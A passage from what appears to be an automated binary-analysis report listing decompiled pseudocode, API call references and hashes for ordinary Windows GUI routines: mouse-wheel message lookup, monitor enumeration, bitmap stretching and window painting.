				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                                                                0x004072c3
                                                                                0x004072c5
                                                                                0x004072c7
                                                                                0x004072d9
                                                                                0x004072e8
                                                                                0x004072f4
                                                                                0x00407300
                                                                                0x00407305
                                                                                0x00407324
                                                                                0x0040730b
                                                                                0x0040731b
                                                                                0x0040731b
                                                                                0x00407329
                                                                                0x00407346
                                                                                0x0040732f
                                                                                0x0040733f
                                                                                0x0040733f
                                                                                0x00407353

                                                                                APIs
                                                                                • FindWindowA.USER32 ref: 004072D4
                                                                                • RegisterClipboardFormatA.USER32 ref: 004072E0
                                                                                • RegisterClipboardFormatA.USER32 ref: 004072EF
                                                                                • RegisterClipboardFormatA.USER32 ref: 004072FB
                                                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407313
                                                                                • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407337
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                • API String ID: 1416857345-3736581797
                                                                                • Opcode ID: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction ID: c3ea70c89f0ea32afbae36cd1b4525e37670a6f3dc8583698f1fb75301f17434
                                                                                • Opcode Fuzzy Hash: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction Fuzzy Hash: 56113D70A48302AFF3109FA5C841F6AB7A8EF44350F204136BD40AB2C1D6B97D40D7AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426730, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E00426730(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x487ac3 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x487ab0 = E00426184(7, _t60,  *0x487ab0, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                                                0x00426739
                                                                                0x0042673c
                                                                                0x00426746
                                                                                0x00426776
                                                                                0x0042677c
                                                                                0x00426838
                                                                                0x00426840
                                                                                0x00426840
                                                                                0x00426784
                                                                                0x00426789
                                                                                0x00426794
                                                                                0x0042679f
                                                                                0x004267a4
                                                                                0x0042680d
                                                                                0x00426825
                                                                                0x00426836
                                                                                0x00426821
                                                                                0x00426821
                                                                                0x00426821
                                                                                0x00000000
                                                                                0x0042680d
                                                                                0x004267b0
                                                                                0x004267bf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004267d1
                                                                                0x004267e9
                                                                                0x004267ff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00426805
                                                                                0x00426807
                                                                                0x00426807
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004267e9
                                                                                0x0042675a
                                                                                0x0042676f
                                                                                0x00000000

                                                                                APIs
                                                                                • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426769
                                                                                • GetSystemMetrics.USER32 ref: 0042678E
                                                                                • GetSystemMetrics.USER32 ref: 00426799
                                                                                • GetClipBox.GDI32(?,?), ref: 004267AB
                                                                                • GetDCOrgEx.GDI32(?,?), ref: 004267B8
                                                                                • OffsetRect.USER32(?,?,?), ref: 004267D1
                                                                                • IntersectRect.USER32 ref: 004267E2
                                                                                • IntersectRect.USER32 ref: 004267F8
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                • String ID: EnumDisplayMonitors
                                                                                • API String ID: 362875416-2491903729
                                                                                • Opcode ID: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction ID: 5c2863997b3cb52ba5e54f8a7e46798dd5e683742b03c6a955819f0358736904
                                                                                • Opcode Fuzzy Hash: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction Fuzzy Hash: EC3130B2E05119AFDB10DFA5E8449EFB7BCEF09304F51452BE915E2240EB38DA118BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423C56, Relevance: 16.7, APIs: 11, Instructions: 165windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E00423C56(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x423ea4; // 0xf
				E0041FE98(_v8, __ecx, _t167);
				E004242C8(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406BD0();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406BA0();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406AF8();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406AF8();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L5:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L5;
					}
				}
				if(_t80 == 0) {
					if(E00423FE4(_t159) == 0) {
						SetStretchBltMode(E0041FDC4(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x423e95);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424268(_t159, _t160);
				}
				_t87 = E00423F28(_t159);
				_t171 =  *0x423ea4; // 0xf
				E0041FE98(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00423F28(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(E00423E9C);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406BD0();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x423e2a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406A58();
					_v28 = E004201BC(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
					E00420360( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00423F28(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x423e6f);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}





























                                                                                0x00423c56
                                                                                0x00423c59
                                                                                0x00423c5b
                                                                                0x00423c61
                                                                                0x00423c63
                                                                                0x00423c66
                                                                                0x00423c68
                                                                                0x00423c6b
                                                                                0x00423c74
                                                                                0x00423c7b
                                                                                0x00423c82
                                                                                0x00423c85
                                                                                0x00423c89
                                                                                0x00423c8e
                                                                                0x00423c90
                                                                                0x00423c92
                                                                                0x00423c96
                                                                                0x00423c99
                                                                                0x00423c9a
                                                                                0x00423c9f
                                                                                0x00423ca8
                                                                                0x00423ca9
                                                                                0x00423cae
                                                                                0x00423cae
                                                                                0x00423cb2
                                                                                0x00423cb7
                                                                                0x00423cba
                                                                                0x00423cbb
                                                                                0x00423cc0
                                                                                0x00423cc1
                                                                                0x00423cc6
                                                                                0x00423cca
                                                                                0x00423ccf
                                                                                0x00423cd3
                                                                                0x00423cd8
                                                                                0x00423ce9
                                                                                0x00423ce9
                                                                                0x00423cda
                                                                                0x00423cde
                                                                                0x00423ce7
                                                                                0x00423ced
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423ce7
                                                                                0x00423cf1
                                                                                0x00423d34
                                                                                0x00423d41
                                                                                0x00423d41
                                                                                0x00423cf3
                                                                                0x00423cfe
                                                                                0x00423d0c
                                                                                0x00423d24
                                                                                0x00423d24
                                                                                0x00423d48
                                                                                0x00423d49
                                                                                0x00423d4e
                                                                                0x00423d51
                                                                                0x00423d5d
                                                                                0x00423d61
                                                                                0x00423d61
                                                                                0x00423d68
                                                                                0x00423d6d
                                                                                0x00423d73
                                                                                0x00423d81
                                                                                0x00423e6a
                                                                                0x00423e71
                                                                                0x00423e74
                                                                                0x00423e77
                                                                                0x00423e80
                                                                                0x00423e82
                                                                                0x00423e87
                                                                                0x00423e8b
                                                                                0x00423e8e
                                                                                0x00423e8f
                                                                                0x00000000
                                                                                0x00423e8f
                                                                                0x00423e94
                                                                                0x00423d87
                                                                                0x00423d89
                                                                                0x00423d8e
                                                                                0x00423d93
                                                                                0x00423d94
                                                                                0x00423d99
                                                                                0x00423d9c
                                                                                0x00423da1
                                                                                0x00423dab
                                                                                0x00423dbb
                                                                                0x00423df5
                                                                                0x00423dfa
                                                                                0x00423dfc
                                                                                0x00423dff
                                                                                0x00423e02
                                                                                0x00423e0b
                                                                                0x00423e15
                                                                                0x00423e15
                                                                                0x00423e1e
                                                                                0x00000000
                                                                                0x00423e24
                                                                                0x00423e29
                                                                                0x00423e29

                                                                                APIs
                                                                                  • Part of subcall function 004242C8: 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                • 72E7B410.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • 72E7B150.GDI32(?,?,?,000000FF), ref: 00423CA9
                                                                                • 72E7AD70.GDI32(?,0000000C), ref: 00423CBB
                                                                                • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • 72E7A590.GDI32(00000000,00000000,00423E2A,?,?,0000000E,00000000,?,0000000C), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Brush$A590B150B380B410CreateHalftoneModeObjectPaletteSelectStretch
                                                                                • String ID:
                                                                                • API String ID: 1694230195-0
                                                                                • Opcode ID: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction ID: 825b2f3cc26a81e0a9d54884291c02793650457c26c19799d0130e999e4e799f
                                                                                • Opcode Fuzzy Hash: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction Fuzzy Hash: 10514971B00215AFCB40EFA9D985E5EBBF8AB09304F51846AF508EB291D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439F44, Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E00439F44(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00438B9C(_t83) != 0) {
						_t38 = E00439A64(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00406E20();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00406A50();
					_v12 = _t47;
					L00407080();
					L00406A58();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0043BD14(_t83),  &_v80);
					E00436848(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E00439F44(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43a096, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00406A30();
					EndPaint(E0043BD14(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43a09d);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                                                                0x00439f45
                                                                                0x00439f47
                                                                                0x00439f4c
                                                                                0x00439f4d
                                                                                0x00439f4f
                                                                                0x00439f58
                                                                                0x00439f64
                                                                                0x00439f83
                                                                                0x00439f71
                                                                                0x00439f77
                                                                                0x00439f77
                                                                                0x0043a0a3
                                                                                0x00439f8d
                                                                                0x00439f8f
                                                                                0x00439f9d
                                                                                0x00439fab
                                                                                0x00439fae
                                                                                0x00439fb3
                                                                                0x00439fb8
                                                                                0x00439fbe
                                                                                0x00439fc5
                                                                                0x00439fca
                                                                                0x00439fda
                                                                                0x00439fe8
                                                                                0x00439ff7
                                                                                0x0043a00c
                                                                                0x0043a014
                                                                                0x0043a01b
                                                                                0x0043a022
                                                                                0x0043a039
                                                                                0x0043a047
                                                                                0x0043a04d
                                                                                0x0043a04e
                                                                                0x0043a050
                                                                                0x0043a053
                                                                                0x0043a064
                                                                                0x0043a06b
                                                                                0x0043a06e
                                                                                0x0043a071
                                                                                0x0043a07e
                                                                                0x0043a087
                                                                                0x0043a095
                                                                                0x0043a095

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 00439F8F
                                                                                • 72E7A520.GDI32(00000000,?), ref: 00439FB3
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 00439FBE
                                                                                • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00439FC5
                                                                                • SelectObject.GDI32(00000000,?), ref: 00439FD5
                                                                                • BeginPaint.USER32(00000000,?,00000000,0043A096,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00439FF7
                                                                                • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043A053
                                                                                • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043A064
                                                                                • SelectObject.GDI32(00000000,?), ref: 0043A07E
                                                                                • DeleteDC.GDI32(00000000), ref: 0043A087
                                                                                • DeleteObject.GDI32(?), ref: 0043A090
                                                                                  • Part of subcall function 00439A64: BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                  • Part of subcall function 00439A64: EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                                                                • String ID:
                                                                                • API String ID: 3782911080-0
                                                                                • Opcode ID: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction ID: 306c7afd92af40a217dbe2fff1c1d45e4c1a113081206cfcf9a7c14f3e5101a4
                                                                                • Opcode Fuzzy Hash: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction Fuzzy Hash: 5A412E71B00204AFD710EFA9CC85B9EB7F9AF4D704F10447AB91AEB291DA78AD058B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041F5A8, Relevance: 15.2, APIs: 10, Instructions: 224windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E0041F5A8(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
				struct HDC__* _t191;
				int* _t196;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				int _t216;
				int* _t218;
				void* _t221;
				void* _t223;
				intOrPtr _t224;

				_t198 = __ecx;
				_t221 = _t223;
				_t224 = _t223 + 0xffffffd8;
				_v12 = __ecx;
				_t218 = __edx;
				_v8 = __eax;
				_t196 = _a8;
				if(_v12 != 0) {
					E0041FA80(_v8);
					 *[fs:eax] = _t224;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41f84e, _t221);
					_t204 =  *0x41f860; // 0x9
					E0041FE98(_v8, __ecx, _t204);
					E0041FA80(E00423F28(_v12));
					_push(_t221);
					_push(0x41f829);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_v20 = _t218[2] -  *_t218;
					_v24 = _t218[3] - _t218[1];
					_t216 = _t196[2] -  *_t196;
					_v16 = _t196[3] - _t196[1];
					if(E00424014(_v12, _t198) != _a4) {
						_v40 = E00423960(1);
						_t198 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424188(_v40, _a4, __eflags);
						_t116 = E00423F28(_v40);
						_t208 =  *0x41f864; // 0x1
						E0041FE98(_t116,  *_v40, _t208);
						_v36 =  *((intOrPtr*)(E00423F28(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v44 = _t191;
						_push(0);
						L00406A58();
						_v36 = _t191;
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t221);
					_push(0x41f807);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_t124 = E00423F28(_v12);
					_t209 =  *0x41f864; // 0x1
					E0041FE98(_t124, _t198, _t209);
					if(E0041F44C( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E00423F28(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E00420360( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E00423F28(_v12) + 4), _v24, _v20);
					}
					_pop(_t210);
					 *[fs:eax] = _t210;
					_push(E0041F80E);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035B4(_v40);
					}
				}
				return __eax;
			}






























                                                                                0x0041f5a8
                                                                                0x0041f5a9
                                                                                0x0041f5ab
                                                                                0x0041f5b1
                                                                                0x0041f5b4
                                                                                0x0041f5b6
                                                                                0x0041f5b9
                                                                                0x0041f5c0
                                                                                0x0041f5c9
                                                                                0x0041f5d9
                                                                                0x0041f5e1
                                                                                0x0041f5e4
                                                                                0x0041f5ed
                                                                                0x0041f5fa
                                                                                0x0041f601
                                                                                0x0041f602
                                                                                0x0041f607
                                                                                0x0041f60a
                                                                                0x0041f612
                                                                                0x0041f61b
                                                                                0x0041f621
                                                                                0x0041f629
                                                                                0x0041f637
                                                                                0x0041f671
                                                                                0x0041f67a
                                                                                0x0041f67c
                                                                                0x0041f685
                                                                                0x0041f68d
                                                                                0x0041f692
                                                                                0x0041f698
                                                                                0x0041f6a8
                                                                                0x0041f6ab
                                                                                0x0041f6ad
                                                                                0x0041f639
                                                                                0x0041f63b
                                                                                0x0041f643
                                                                                0x0041f646
                                                                                0x0041f649
                                                                                0x0041f64b
                                                                                0x0041f650
                                                                                0x0041f660
                                                                                0x0041f660
                                                                                0x0041f6b2
                                                                                0x0041f6b3
                                                                                0x0041f6b8
                                                                                0x0041f6bb
                                                                                0x0041f6c1
                                                                                0x0041f6c6
                                                                                0x0041f6cc
                                                                                0x0041f6de
                                                                                0x0041f753
                                                                                0x0041f766
                                                                                0x0041f77a
                                                                                0x0041f7a8
                                                                                0x0041f7b8
                                                                                0x0041f7c8
                                                                                0x0041f6e0
                                                                                0x0041f716
                                                                                0x0041f716
                                                                                0x0041f7cf
                                                                                0x0041f7d2
                                                                                0x0041f7d5
                                                                                0x0041f7de
                                                                                0x0041f7ea
                                                                                0x0041f7ee
                                                                                0x0041f7f8
                                                                                0x0041f7f8
                                                                                0x00000000
                                                                                0x0041f7e0
                                                                                0x00000000
                                                                                0x0041f7e3
                                                                                0x0041f7de
                                                                                0x0041f85b

                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                • 72E7A590.GDI32(00000000), ref: 0041F64B
                                                                                • SelectObject.GDI32(?,?), ref: 0041F65B
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041F753
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041F761
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0041F775
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041F7A8
                                                                                • SetTextColor.GDI32(?,?), ref: 0041F7B8
                                                                                • SetBkColor.GDI32(?,?), ref: 0041F7C8
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041F7F8
                                                                                • DeleteDC.GDI32(?), ref: 0041F801
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
